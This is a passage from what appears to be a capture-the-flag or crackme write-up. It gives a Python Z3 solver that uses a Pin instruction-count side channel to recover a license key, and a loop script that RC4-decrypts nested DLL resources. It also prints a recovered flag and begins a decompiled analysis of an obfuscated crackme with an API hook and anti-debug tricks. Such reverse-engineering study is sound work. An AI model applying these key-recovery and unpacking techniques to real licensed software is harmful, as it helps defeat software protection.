bit_i = bit % 8
b = Extract(bit_i, bit_i, y_blocks[q][byte_i])
s.add(b == BitVecVal(int(v), 1))
return s, x, y_blocks

def model_eval_u8(m, exprs) -> bytes:
out = bytearray()
for e in exprs: out.append(int(m.eval(e, model_completion=True).as_long()) & 0xFF)
return bytes(out)

def solve_one_input(fixed_bits: Dict[Tuple[int, int], int], forbid_zero_input: bool = True, printable_only: bool = True, printable_min: int = 0x20, printable_max: int = 0x7E, allowed_charset: Optional[bytes] = None) -> Optional[Tuple[bytes, bytes]]:
s, x, y_blocks = build_solver(
fixed_bits,
forbid_zero_input=forbid_zero_input,
printable_only=printable_only,
printable_min=printable_min,
printable_max=printable_max,
allowed_charset=allowed_charset)
if s.check() != sat: return None
m = s.model()
inp = model_eval_u8(m, x)
enc = bytearray()
for q in range(N_QWORDS): enc.extend(model_eval_u8(m, y_blocks[q]))
return bytes(inp), bytes(enc)

def qword_plain_uniqueness(fixed_bits: Dict[Tuple[int, int], int], q: int, forbid_zero_input: bool = True, printable_only: bool = True, printable_min: int = 0x20, printable_max: int = 0x7E, allowed_charset: Optional[bytes] = None):
s, x, _ = build_solver(
fixed_bits,
forbid_zero_input=forbid_zero_input,
printable_only=printable_only,
printable_min=printable_min,
printable_max=printable_max,
allowed_charset=allowed_charset)
if s.check() != sat: return False, None, None
m1 = s.model()
off = q * 8
v1 = [int(m1.eval(x[off + i], model_completion=True).as_long()) & 0xFF for i in range(8)]
v1_hex = bytes(v1).hex()
s.add(Or(*[(x[off + i] != bv8(v1[i])) for i in range(8)]))
if s.check() == sat:
m2 = s.model()
v2 = [int(m2.eval(x[off + i], model_completion=True).as_long()) & 0xFF for i in range(8)]
return False, v1_hex, bytes(v2).hex()
return True, v1_hex, None

class ShrOracle:
def __init__(
self,
workdir: Path,
pin_cmd: List[str],
input_file: str,
shr_file: str,
timeout_sec: float = 15.0,
retries: int = 2,
samples: int = 1):
self.workdir = Path(workdir)
self.pin_cmd = pin_cmd
self.input_file = input_file
self.shr_file = shr_file
self.timeout_sec = timeout_sec
self.retries = retries
self.samples = max(1, int(samples))

@staticmethod
def parse_int(text: str) -> Optional[int]:
m = re.search(r"-?\d+", text)
if not m: return None
return int(m.group(0))
def run_once(self, inp32: bytes) -> int:
in_path = self.workdir / self.input_file
shr_path = self.workdir / self.shr_file
in_path.write_bytes(inp32)
if shr_path.exists():
shr_path.unlink()
subprocess.run(
self.pin_cmd,
cwd=str(self.workdir),
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL,
check=False)
t0 = time.time()
while time.time() - t0 < self.timeout_sec:
if shr_path.exists():
txt = shr_path.read_text(encoding="utf-8", errors="ignore").strip()
if txt:
v = self.parse_int(txt)
if v is not None: return v
time.sleep(0.03)
raise RuntimeError(f"Read shr file timeout")

def query(self, inp32: bytes) -> int:
best = None
last_err = None
for _ in range(self.samples):
ok = False
for _ in range(self.retries + 1):
try:
v = self.run_once(inp32)
best = v if best is None else max(best, v)
ok = True
break
except Exception as e: last_err = e
if not ok: pass
if best is None: raise RuntimeError(f"oracle failed: {last_err}")
return best

def gbit_to_qb(g: int) -> Tuple[int, int]: return g // 64, g % 64
def qb_to_gbit(q: int, b: int) -> int: return q * 64 + b
def enc_bit(enc32: bytes, g: int) -> int:
byte_i = g // 8
bit_i = g % 8
return (enc32[byte_i] >> bit_i) & 1

def fixed_to_global_map(fixed_bits: Dict[Tuple[int, int], int]) -> Dict[int, int]:
out = {}
for (q, b), v in fixed_bits.items(): out[qb_to_gbit(q, b)] = int(v)
return out

def fixed_cipher_hex32(fixed_bits: Dict[Tuple[int, int], int]) -> str:
b = bytearray(TOTAL_BYTES)
for (q, bit), v in fixed_bits.items():
if int(v) == 1:
idx = q * 8 + (bit // 8)
b[idx] |= (1 << (bit % 8))
return b.hex()

def clear_qword_bits(fixed_bits: Dict[Tuple[int, int], int], q: int):
for b in range(64): fixed_bits.pop((q, b), None)

def clear_from_qword(fixed_bits: Dict[Tuple[int, int], int], q: int):
for qq in range(q, N_QWORDS): clear_qword_bits(fixed_bits, qq)

def absorb_by_score(fixed_bits: Dict[Tuple[int, int], int], enc32: bytes, score: int):
newly = []
conflict = None
upto = min(max(int(score), 0), TOTAL_BITS)
for g in range(upto):
q, b = gbit_to_qb(g)
bitv = enc_bit(enc32, g)
key = (q, b)
if key in fixed_bits:
if fixed_bits[key] != bitv:
conflict = {"gbit": g, "q": q, "bit": b, "old": fixed_bits[key], "new": bitv}
break
else:
fixed_bits[key] = bitv
newly.append((q, b, bitv))
return newly, conflict

def save_ckpt(path: Path, data: Dict[str, Any]): path.write_text(json.dumps(data, ensure_ascii=False, indent=2), encoding="utf-8")

def load_ckpt(path: Path) -> Optional[Dict[str, Any]]:
if not path.exists(): return None
return json.loads(path.read_text(encoding="utf-8", errors="ignore"))

def encode_fixed_bits(fixed_bits: Dict[Tuple[int, int], int]) -> List[Dict[str, int]]:
arr = []
for (q, b), v in sorted(fixed_bits.items()): arr.append({"q": q, "bit": b, "v": int(v)})
return arr

def decode_fixed_bits(arr: List[Dict[str, int]]) -> Dict[Tuple[int, int], int]:
out = {}
for it in arr: out[(int(it["q"]), int(it["bit"]))] = int(it["v"])
return out

def run(args):
workdir = Path(args.workdir).resolve()
ckpt_path = workdir / args.ckpt
result_path = workdir / args.result_json
pin_cmd = [args.pin, "-t", args.tool]
if args.tool_out_knob: pin_cmd += ["-o", args.shr_file]
pin_cmd += ["--", args.app]
oracle = ShrOracle(
workdir=workdir,
pin_cmd=pin_cmd,
input_file=args.input_file,
shr_file=args.shr_file,
timeout_sec=args.timeout,
retries=args.oracle_retries,
samples=args.oracle_samples)
printable_only = bool(getattr(args, "printable_only", True))
printable_min = int(getattr(args, "printable_min", 0x20))
printable_max = int(getattr(args, "printable_max", 0x7E))
allowed_charset = getattr(args, "allowed_charset", None)
if isinstance(allowed_charset, str): allowed_charset = allowed_charset.encode("utf-8")
fixed_bits: Dict[Tuple[int, int], int] = {}
current_q = 0
bit63_ambiguous: Dict[int, bool] = {}
probe_cache: Dict[Tuple[Tuple[int, int, int], ...], Tuple[Optional[int], Optional[str], Optional[str], str]] = {}
if args.resume and ckpt_path.exists():
ck = load_ckpt(ckpt_path)
fixed_bits = decode_fixed_bits(ck.get("fixed_bits", []))
current_q = int(ck.get("current_q", 0))
bit63_ambiguous = {int(q): True for q in ck.get("bit63_ambiguous", [])}
print(f"[+] recover from checkpoint: q={current_q}, fixed_bits={len(fixed_bits)}")
else: print("[+] start")

def cache_key(fb: Dict[Tuple[int, int], int]): return tuple(sorted((q, b, int(v)) for (q, b), v in fb.items()))
def solve_sat_only(fb: Dict[Tuple[int, int], int]):
return solve_one_input(
fb,
forbid_zero_input=(not args.allow_zero_input),
printable_only=printable_only,
printable_min=printable_min,
printable_max=printable_max,
allowed_charset=allowed_charset)

def probe(fb: Dict[Tuple[int, int], int]):
k = cache_key(fb)
if k in probe_cache: return probe_cache[k]
sat_one = solve_sat_only(fb)
if sat_one is None:
probe_cache[k] = (None, None, None, "unsat")
return probe_cache[k]
inp32, enc32 = sat_one
try:
sc = oracle.query(inp32)
probe_cache[k] = (sc, inp32.hex(), enc32.hex(), "ok")
except Exception as e: probe_cache[k] = (None, inp32.hex(), enc32.hex(), f"oracle_error:{e}")
return probe_cache[k]

def is_sat_status(st: str) -> bool: return st != "unsat"
def dump_ckpt(note: str):
obj = {
"note": note,
"current_q": current_q,
"fixed_bits_count": len(fixed_bits),
"fixed_bits": encode_fixed_bits(fixed_bits),
"bit63_ambiguous": sorted([q for q, v in bit63_ambiguous.items() if v]),
"fixed_cipher_hex32_partial": fixed_cipher_hex32(fixed_bits),
"ts": time.time(),
"cmd": pin_cmd
}
save_ckpt(ckpt_path, obj)

def clear_ambiguous_from_q(q_start: int):
for qq in range(q_start, N_QWORDS): bit63_ambiguous.pop(qq, None)

def decide_bit63_for_q(q: int):
c0 = dict(fixed_bits); c0[(q, 63)] = 0
c1 = dict(fixed_bits); c1[(q, 63)] = 1
r0 = probe(c0)
r1 = probe(c1)
s0, _, _, st0 = r0
s1, _, _, st1 = r1
sat0 = is_sat_status(st0)
sat1 = is_sat_status(st1)
print(f"[q{q} bit63 SAT-check] 0->{s0} ({st0}), 1->{s1} ({st1})")
if sat0 and not sat1:
fixed_bits[(q, 63)] = 0
bit63_ambiguous[q] = False
print(f"[q{q}] bit63 = 0 (only SAT)")
return
if sat1 and not sat0:
fixed_bits[(q, 63)] = 1
bit63_ambiguous[q] = False
print(f"[q{q}] bit63 = 1 (only SAT)")
return
if (not sat0) and (not sat1):
raise RuntimeError(f"[q{q}] bit63: both branches UNSAT under printable constraints")
bit63_ambiguous[q] = True
if q < N_QWORDS - 1:
fixed_bits[(q, 63)] = 0
print(f"[q{q}] bit63 0/1 both SAT -> tentative 0, will verify by next q")
else:
fixed_bits.pop((q, 63), None)
print(f"[q{q}] bit63 0/1 both SAT -> keep unresolved for final stage")

for q in range(current_q, N_QWORDS):
current_q = q
print(f"\n========== Recovering qword{q} ==========")
while True:
restart = False
bit = 0
while bit <= 62:
if (q, bit) in fixed_bits:
bit += 1
continue
c0 = dict(fixed_bits); c0[(q, bit)] = 0
c1 = dict(fixed_bits); c1[(q, bit)] = 1
r0 = probe(c0)
r1 = probe(c1)
s0, i0, e0, st0 = r0
s1, i1, e1, st1 = r1
sat0 = is_sat_status(st0)
sat1 = is_sat_status(st1)
print(f"[q{q} bit{bit}] 0->{s0} ({st0}), 1->{s1} ({st1})")
if (
q > 0 and bit == 0 and sat0 and sat1
and (s0 is not None) and (s1 is not None) and (s0 == s1)
and bit63_ambiguous.get(q - 1, False)):
prev = fixed_bits.get((q - 1, 63), 0)
if prev == 0:
print(f" [rule] q{q} bit0 0/1 same score={s0}, flip q{q-1}.bit63: 0->1 and restart q{q}")
fixed_bits[(q - 1, 63)] = 1
bit63_ambiguous[q - 1] = False
clear_from_qword(fixed_bits, q)
clear_ambiguous_from_q(q)
probe_cache.clear()
dump_ckpt(note=f"rollback: set q{q-1}.bit63=1 then restart q{q}")
restart = True
break
if (not sat0) and (not sat1): raise RuntimeError(f"q{q} bit{bit}: both branches UNSAT under printable constraints")
if sat0 and (not sat1):
chosen_bit = 0
sb, ib, eb, stb = r0
elif sat1 and (not sat0):
chosen_bit = 1
sb, ib, eb, stb = r1
else:
if (s0 is None) and (s1 is None):
chosen_bit = 0
sb, ib, eb, stb = r0
print(" [warn] both SAT but no score, fallback choose bit=0")
elif s0 is None:
chosen_bit = 1
sb, ib, eb, stb = r1
elif s1 is None:
chosen_bit = 0
sb, ib, eb, stb = r0
else:
if s1 > s0:
chosen_bit = 1
sb, ib, eb, stb = r1
elif s0 > s1:
chosen_bit = 0
sb, ib, eb, stb = r0
else:
chosen_bit = 0
sb, ib, eb, stb = r0
if eb is None: raise RuntimeError(f"q{q} bit{bit}: chosen branch has no enc hex")
if sb is not None:
enc32 = bytes.fromhex(eb)
newly, conflict = absorb_by_score(fixed_bits, enc32, sb)
else: newly, conflict = [], None
if (q, bit) not in fixed_bits: fixed_bits[(q, bit)] = chosen_bit
print(f" -> bit{bit}={chosen_bit}, score={sb}, auto_add={len(newly)}")
if conflict is not None: print(f" [warn] absorb conflict at gbit={conflict['gbit']}, old={conflict['old']} new={conflict['new']}")
sample = [(qq, bb, vv) for (qq, bb, vv) in newly if qq == q and bb >= bit][:8]
if sample: print(f" auto sample: {sample}")
dump_ckpt(note=f"q{q} bit{bit} choose {chosen_bit} score={sb}")
bit += 1
if restart: continue
decide_bit63_for_q(q)
dump_ckpt(note=f"q{q} bit63 decided/marked")
uniq, one_hex, alt_hex = qword_plain_uniqueness(
fixed_bits,
q,
forbid_zero_input=(not args.allow_zero_input),
printable_only=printable_only,
printable_min=printable_min,
printable_max=printable_max,
allowed_charset=allowed_charset)
if uniq: print(f"[q{q}] Unique: {one_hex}")
else: print(f"[q{q}] Not unique: one={one_hex}, alt={alt_hex}")
break
print("\n========== Final output ==========")
final_msb_list: List[int]
if (3, 63) in fixed_bits and (not bit63_ambiguous.get(3, False)): final_msb_list = [fixed_bits[(3, 63)]]
else: final_msb_list = [0, 1]
candidates = []
sat_count = 0
for msb in final_msb_list:
fb = dict(fixed_bits)
fb[(3, 63)] = msb
sat_one = solve_one_input(
fb,
forbid_zero_input=(not args.allow_zero_input),
printable_only=printable_only,
printable_min=printable_min,
printable_max=printable_max,
allowed_charset=allowed_charset)
if sat_one is None:
print(f"[final msb={msb}] UNSAT (printable)")
continue
sat_count += 1
inp32, enc32 = sat_one
try:
score = oracle.query(inp32)
status = "ok"
except Exception as e:
score = None
status = f"oracle_error:{e}"
u0 = qword_plain_uniqueness(
fb, 0,
forbid_zero_input=(not args.allow_zero_input),
printable_only=printable_only,
printable_min=printable_min,
printable_max=printable_max,
allowed_charset=allowed_charset)
u1 = qword_plain_uniqueness(
fb, 1,
forbid_zero_input=(not args.allow_zero_input),
printable_only=printable_only,
printable_min=printable_min,
printable_max=printable_max,
allowed_charset=allowed_charset)
u2 = qword_plain_uniqueness(
fb, 2,
forbid_zero_input=(not args.allow_zero_input),
printable_only=printable_only,
printable_min=printable_min,
printable_max=printable_max,
allowed_charset=allowed_charset)
u3 = qword_plain_uniqueness(
fb, 3,
forbid_zero_input=(not args.allow_zero_input),
printable_only=printable_only,
printable_min=printable_min,
printable_max=printable_max,
allowed_charset=allowed_charset)
item = {
"q3_msb": msb,
"status": status,
"shr_num": score,
"input32_hex": inp32.hex(),
"enc32_hex": enc32.hex(),
"fixed_cipher_hex32": fixed_cipher_hex32(fb),
"uniqueness": {
"q0": {"unique": u0[0], "one": u0[1], "alt": u0[2]},
"q1": {"unique": u1[0], "one": u1[1], "alt": u1[2]},
"q2": {"unique": u2[0], "one": u2[1], "alt": u2[2]},
"q3": {"unique": u3[0], "one": u3[1], "alt": u3[2]}}}
candidates.append(item)
print(f"[final msb={msb}] status={status}, shr={score}")
print(f" input32 = {item['input32_hex']}")
if sat_count == 0: raise RuntimeError("final stage: both q3.msb branches UNSAT under printable constraints")
out = {
"config": {
"workdir": str(workdir),
"pin_cmd": pin_cmd,
"input_file": args.input_file,
"shr_file": args.shr_file,
"allow_zero_input": args.allow_zero_input,
"oracle_samples": args.oracle_samples,
"printable_only": printable_only,
"printable_min": printable_min,
"printable_max": printable_max,
"allowed_charset": None if allowed_charset is None else allowed_charset.decode("latin1", errors="ignore")
},
"fixed_bits_count": len(fixed_bits),
"fixed_bits_partial_hex32": fixed_cipher_hex32(fixed_bits),
"bit63_ambiguous": sorted([q for q, v in bit63_ambiguous.items() if v]),
"candidates": candidates}
result_path.write_text(json.dumps(out, ensure_ascii=False, indent=2), encoding="utf-8")
dump_ckpt(note="finished")
print(f"\n[+] Done: {result_path}")
print(f"[+] checkpoint: {ckpt_path}")

def parse_args():
ap = argparse.ArgumentParser()
ap.add_argument("--workdir", default=".")
ap.add_argument("--pin", default="pin")
ap.add_argument("--tool", default="Count.dll")
ap.add_argument("--app", default="LicenseChecker.exe")
ap.add_argument("--tool-out-knob", action="store_true")
ap.add_argument("--input-file", default="license.bin")
ap.add_argument("--shr-file", default="shr_num.txt")
ap.add_argument("--timeout", type=float, default=15.0)
ap.add_argument("--oracle-retries", type=int, default=2)
ap.add_argument("--oracle-samples", type=int, default=1)
ap.add_argument("--allow-zero-input", action="store_true")
ap.add_argument("--resume", action="store_true")
ap.add_argument("--ckpt", default="recover_ckpt.json")
ap.add_argument("--result-json", default="recover_result.json")
return ap.parse_args()

if __name__ == "__main__":
args = parse_args()
run(args)

The first 32 bytes are: M0Oo8zjHkcPSWFzCxmw6jrj1RgNPucTH. And the decrypt function is an RC4, the resource is a new dll.

AutoLicense:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
# -*- coding: utf-8 -*-

import argparse
import json
import os
import re
import subprocess
import sys
from pathlib import Path
from typing import Dict, List, Optional, Tuple
import pefile

IDX_RE = re.compile(r"^recover_result_(\d+)\.json$", re.IGNORECASE)

def rc4_crypt(key: bytes, data: bytes) -> bytes:
if not key: raise ValueError("RC4 key cant be empty")
S = list(range(256))
j = 0
key_len = len(key)
for i in range(256):
j = (j + S[i] + key[i % key_len]) & 0xFF
S[i], S[j] = S[j], S[i]
out = bytearray(len(data))
i = 0
j = 0
for n, b in enumerate(data):
i = (i + 1) & 0xFF
j = (j + S[i]) & 0xFF
S[i], S[j] = S[j], S[i]
k = S[(S[i] + S[j]) & 0xFF]
out[n] = b ^ k
return bytes(out)

def list_indexed_results(workdir: Path) -> Dict[int, Path]:
out: Dict[int, Path] = {}
for p in workdir.glob("recover_result_*.json"):
m = IDX_RE.match(p.name)
if m: out[int(m.group(1))] = p
return out

def safe_int(v, default=-1) -> int:
try: return int(v)
except Exception: return default

def candidate_score(c: dict) -> Tuple[int, int, int]:
status = str(c.get("status", ""))
ok = 1 if status.startswith("ok") else 0
uniq_cnt = 0
uq = c.get("uniqueness", {})
if isinstance(uq, dict):
for k in ("q0", "q1", "q2", "q3"):
v = uq.get(k, {})
if isinstance(v, dict) and bool(v.get("unique")): uniq_cnt += 1
shr = safe_int(c.get("shr_num"), -1)
return (ok, uniq_cnt, shr)

def load_rc4_key_from_recover_result(path: Path) -> bytes:
data = json.loads(path.read_text(encoding="utf-8", errors="ignore"))
cands = data.get("candidates", [])
if not isinstance(cands, list) or not cands: raise RuntimeError(f"{path.name} has no candidates")
valid = []
for c in cands:
hx = (c.get("input32_hex") or "").strip().lower()
if re.fullmatch(r"[0-9a-f]{64}", hx): valid.append((candidate_score(c), c, hx))
if not valid: raise RuntimeError(f"{path.name} candidates has no input32_hex(64 hex)")

valid.sort(key=lambda t: t[0], reverse=True)
best_score, best_c, best_hx = valid[0]
key = bytes.fromhex(best_hx)
if len(key) != 32:
raise RuntimeError(f"{path.name} keylen != 32")
print(
f"[key] use {path.name}: score={best_score}, "
f"status={best_c.get('status')}, shr={best_c.get('shr_num')}, key={best_hx}")
return key

def extract_named_resource(pe_path: Path, target_name: str) -> Optional[bytes]:
target = target_name.upper()
pe = pefile.PE(str(pe_path), fast_load=False)
try:
if not hasattr(pe, "DIRECTORY_ENTRY_RESOURCE"):
return None
for rtype in pe.DIRECTORY_ENTRY_RESOURCE.entries:
if not hasattr(rtype, "directory"):
continue
for rname in rtype.directory.entries:
name_str = ""
if rname.name is not None:
name_str = str(rname.name).rstrip("\x00")
else: continue
if name_str.upper() != target: continue
if not hasattr(rname, "directory"): continue
for rlang in rname.directory.entries:
data_entry = rlang.data
rva = data_entry.struct.OffsetToData
size = data_entry.struct.Size
blob = pe.get_data(rva, size)
return blob
return None
finally: pe.close()

def run_auto_script(
workdir: Path,
python_exe: str,
auto_script: str,
auto_args: List[str],
recover_result_name: str,
timeout_sec: Optional[int],
quiet: bool) -> int:
result_path = workdir / recover_result_name
if result_path.exists(): result_path.unlink()
cmd = [python_exe, auto_script] + auto_args
print(f"[auto] run: {' '.join(cmd)}")
cp = subprocess.run(
cmd,
cwd=str(workdir),
stdout=subprocess.DEVNULL if quiet else None,
stderr=subprocess.DEVNULL if quiet else None,
timeout=timeout_sec,
check=False,
)
if not result_path.exists(): raise RuntimeError(f"auto.py returns no {recover_result_name} (returncode={cp.returncode})")
return cp.returncode

def bootstrap_initial_result0(
workdir: Path,
python_exe: str,
auto_script: str,
auto_args: List[str],
recover_result_name: str,
timeout_sec: Optional[int],
quiet: bool,):
indexed = list_indexed_results(workdir)
if indexed: return
plain = workdir / recover_result_name
r0 = workdir / "recover_result_0.json"
if plain.exists():
if r0.exists(): raise RuntimeError("Exist recover_result.json and recover_result_0.json exists but conflict.")
plain.replace(r0)
print("[bootstrap] recover_result.json -> recover_result_0.json")
return
print("[bootstrap] no recover_result found, run auto.py to generate initial key")
run_auto_script(
workdir=workdir,
python_exe=python_exe,
auto_script=auto_script,
auto_args=auto_args,
recover_result_name=recover_result_name,
timeout_sec=timeout_sec,
quiet=quiet,
)
if r0.exists(): raise RuntimeError("Gen recover_result.json but recover_result_0.json exists")
(workdir / recover_result_name).replace(r0)
print("[bootstrap] recover_result.json -> recover_result_0.json")

def main():
ap = argparse.ArgumentParser(description="Matryoshka")
ap.add_argument("--workdir", default=".")
ap.add_argument("--dll", default="Doll.dll")
ap.add_argument("--resource-name", default="MATRYOSHKA")
ap.add_argument("--recover-result-name", default="recover_result.json")
ap.add_argument("--auto-script", default="autore.py")
ap.add_argument("--python", dest="python_exe", default=sys.executable)
ap.add_argument("--auto-arg", action="append", default=[])
ap.add_argument("--timeout", type=int, default=None)
ap.add_argument("--max-rounds", type=int, default=200)
ap.add_argument("--quiet", action="store_true")
args = ap.parse_args()
workdir = Path(args.workdir).resolve()
dll_path = workdir / args.dll
if not dll_path.exists(): raise FileNotFoundError(f"DLL not found: {dll_path}")
auto_script_path = workdir / args.auto_script
if not auto_script_path.exists(): raise FileNotFoundError(f"Script not found: {auto_script_path}")
print(f"[+] workdir = {workdir}")
print(f"[+] dll = {dll_path.name}")
print(f"[+] auto = {args.auto_script}")
bootstrap_initial_result0(
workdir=workdir,
python_exe=args.python_exe,
auto_script=args.auto_script,
auto_args=args.auto_arg,
recover_result_name=args.recover_result_name,
timeout_sec=args.timeout,
quiet=args.quiet,)
stem = dll_path.stem
suffix = dll_path.suffix
for round_i in range(args.max_rounds):
indexed = list_indexed_results(workdir)
if not indexed: raise RuntimeError("No recover_result_<idx>.json")
idx = max(indexed.keys())
result_idx_path = indexed[idx]
next_result_path = workdir / f"recover_result_{idx + 1}.json"
print(f"\n===== ROUND {round_i} | idx={idx} =====")
print(f"[state] current key source: {result_idx_path.name}")
mat_blob = extract_named_resource(dll_path, args.resource_name)
if mat_blob is None:
print(f"[done] {dll_path.name} has no {args.resource_name}")
return
print(f"[res] found {args.resource_name}, size={len(mat_blob)} bytes")
key = load_rc4_key_from_recover_result(result_idx_path)
backup_dll = workdir / f"{stem}_{idx}{suffix}"
if backup_dll.exists():
print(f"[skip] {backup_dll.name} exists")
else:
dec = rc4_crypt(key, mat_blob)
os.replace(dll_path, backup_dll)
dll_path.write_bytes(dec)
print(f"[ok] backup old -> {backup_dll.name}")
print(f"[ok] write decrypted -> {dll_path.name} ({len(dec)} bytes)")
if next_result_path.exists():
print(f"[skip] {next_result_path.name} already exists, skip auto.py")
continue
rc = run_auto_script(
workdir=workdir,
python_exe=args.python_exe,
auto_script=args.auto_script,
auto_args=args.auto_arg,
recover_result_name=args.recover_result_name,
timeout_sec=args.timeout,
quiet=args.quiet,)
plain_result = workdir / args.recover_result_name
plain_result.replace(next_result_path)
print(f"[ok] auto.py rc={rc}, rename -> {next_result_path.name}")
raise RuntimeError(f"Reach max_rounds={args.max_rounds}")

if __name__ == "__main__":
main()

CMO{1NsiD3_EV3RY_stOrY_lIe$_an0TH3r_s70Ry_WAITiNG_7o_bE_oPEn3d}

Crackme #9

There are lots of functions with junk codes, after removing obfuscating, some of them have similar format:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
int __thiscall Obf_funcXX(_DWORD *this)
{
this_1 = this;
if ( !this[XX] )
{
xx = Val;
v4[1] = *this_1;
v5 = Obf_funcXX(this_1);
v2 = sub_401CBA(v4, v5, Val);
v3 = sub_40118D(v2);
this_1[12] = v3;
}
return this_1[XX];
}

The sub_401CBA is a function to search for DLL functions:

Address of function Name sub_401CBA returns
sub_401397 user32_CallWindowProcA
sub_401010, sub_4013DA advapi32_CryptAcquireContextA
sub_401022, sub_401443 advapi32_CryptCreateHash
sub_401058, sub_40158D advapi32_CryptDestroyHash
sub_40107C, sub_40166A advapi32_CryptGetHashParam
sub_40108E, sub_4016DF advapi32_CryptHashData
sub_402C24, sub_40187A ntdll_KiUserExceptionDispatcher
sub_4010E4, sub_40194C ntdll_NtContinue
sub_4010F6, sub_4019B5 ntdll_NtQueryInformationProcess
sub_402BC7, sub_401B2E ntdll_Wow64Transition

Notice that there is a function executed before main:

1
2
3
4
5
6
7
void *__thiscall Hook_CallWindowProcA(void *this)
{
sub_40113E();
sub_40112C();
CallWindowProcA = (LRESULT (__stdcall *)(WNDPROC, HWND, UINT, WPARAM, LPARAM))sub_402E5A;
return this;
}

This function changed the address of CallWindowProcA to a custom function sub_402E5A. For this function:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
int __stdcall Hooked_CallWindowProcA(int a1, int a2, int a3, int a4, int a5)
{
v5 = sub_402BF1();
if ( sub_402B6D(v5) )
{
v6 = (_BYTE *)sub_402CAC();
sub_402CE0(v6);
}
else
{
sub_402CAC();
sub_402C24(p_sub_402E1C, &unk_40D24C);
}
v7 = sub_401367();
v9 = (int (__cdecl *)(int, int, int, int, int))sub_401397(v7);
return v9(a1, a2, a3, a4, a5);
}

The function sub_402B6D is an anti-debug function, will return 1 if debugger exists. p_sub_402E1C will install some handler for exception:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
void __cdecl __noreturn p_sub_402E1C(int a1)
{
unk_40D254 = a1;
dword_40D250 = retaddr;
v1 = sub_40448C();
sub_404562(v1, (_DWORD *)dword_40D250, unk_40D254);
v2 = sub_40113E();
sub_4010E4(v2, unk_40D254, 0);
__debugbreak();
}

_DWORD *__thiscall sub_404562(int this, _DWORD *a2, int a3)
{
if ( !*(_BYTE *)(this + 8) )
{
result = a2;
switch ( *a2 )
{
case 0x80000003:
return (_DWORD *)sub_4042EC((_DWORD *)this, a3);
case 0x80000004:
return (_DWORD *)sub_4043CA(this, a3);
case 0x80000001:
return (_DWORD *)sub_404350(this, (int)a2, a3);
}
}
return result;
}

Then for the interaction logic of the program, check dialog table:

1
2
3
4
5
6
7
8
9
.rdata:0040B3F0                 dd offset ??_R4MainDialog@@6B@ ; const MainDialog::`RTTI Complete Object Locator'
.rdata:0040B3F4 ; const MainDialog::`vftable'
.rdata:0040B3F4 ??_7MainDialog@@6B@ dd offset sub_405377
.rdata:0040B3F4 ; DATA XREF: sub_405196+15↑o
.rdata:0040B3F4 ; sub_4052B8+7↑o
.rdata:0040B3F8 dd offset sub_4055D3
.rdata:0040B3FC dd offset sub_405536
.rdata:0040B400 dd offset sub_404E71
.rdata:0040B404 dd offset sub_405497

Interface selection function:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
int __userpurge sub_405536@<eax>(int a1@<ecx>, int a2@<ebx>, __int16 a3, int a4)
{
switch ( a3 )
{
case 1001:
sub_405399(a1, a2);
break;
case 1002:
hInstance = *(HINSTANCE *)(a1 + 4);
sub_4025EC(v7, &unk_40B3CD);
sub_40574D(hInstance, 132, v7[0], v7[1], v7[2], v7[3], v7[4], v7[5]);
sub_404E89((LPARAM)dwInitParam, *(HWND *)(a1 + 8));
sub_4057DA(dwInitParam);
break;
case 1003:
EndDialog(*(HWND *)(a1 + 8), 0);
break;
case 1007:
sub_405702();
break;
case 1010:
ShellExecuteA(0, "open", "https://crackmes.one", 0, 0, 3);
break;
default:
return 0;
}
return 1;
}

For the check part:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
unsigned int __usercall sub_405399@<eax>(int a1@<ecx>, int a2@<ebx>)
{
memset(input_, 0, sizeof(input_));
GetDlgItemTextA(*(HWND *)(a1 + 8), 1006, input_, 255);
if ( sub_4030A5(*(_DWORD **)(a1 + 20), a2, (int)input_) )
{
sub_4025EC(Src_1, input_);
sub_40268B(v16, (int)Src_1);
sub_405724((int)Src_1);
sub_402876(Src, (int)v17);
hInstance = *(HINSTANCE *)(a1 + 4);
sub_40515A(&v6, Src);
sub_40574D(dwInitParam, hInstance, 134, v6, v7, v8, v9, v10, v11);
sub_404E89((LPARAM)dwInitParam, *(HWND *)(a1 + 8));
sub_4057DA(dwInitParam);
sub_405724((int)Src);
return sub_402781(v16);
}
else
{
hInstance_1 = *(HINSTANCE *)(a1 + 4);
sub_4025EC(&v6, &unk_40B3CE);
sub_40574D(dwInitParam, hInstance_1, 136, v6, v7, v8, v9, v10, v11);
sub_404E89((LPARAM)dwInitParam, *(HWND *)(a1 + 8));
return sub_4057DA(dwInitParam);
}
}

The sub_4030A5 is the input processing function:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
char __userpurge sub_4030A5@<al>(int *a1@<ecx>, int a2@<ebx>, int input)
{
if ( !input )
return 0;
v5 = sub_40448C();
sub_4046C8((int)v5, *a1, a1[1], a1[2], a1[3]);
v6 = sub_408AAA(0x14u);
if ( v6 )
{
*v6 = 0;
v6[1] = 0;
v6[2] = 0;
v6[3] = 0;
v6[4] = 0;
v7 = (void *)((int (*)(void))loc_40A000)();
}
else
{
v7 = 0;
}
n20 = 20;
v8 = (*(int (__thiscall **)(void *, int, int))byte_40A025)(v7, input, a2);
sub_408ADA(v7);
v9 = sub_40448C();
sub_404732((int)v9);
return v8;
}

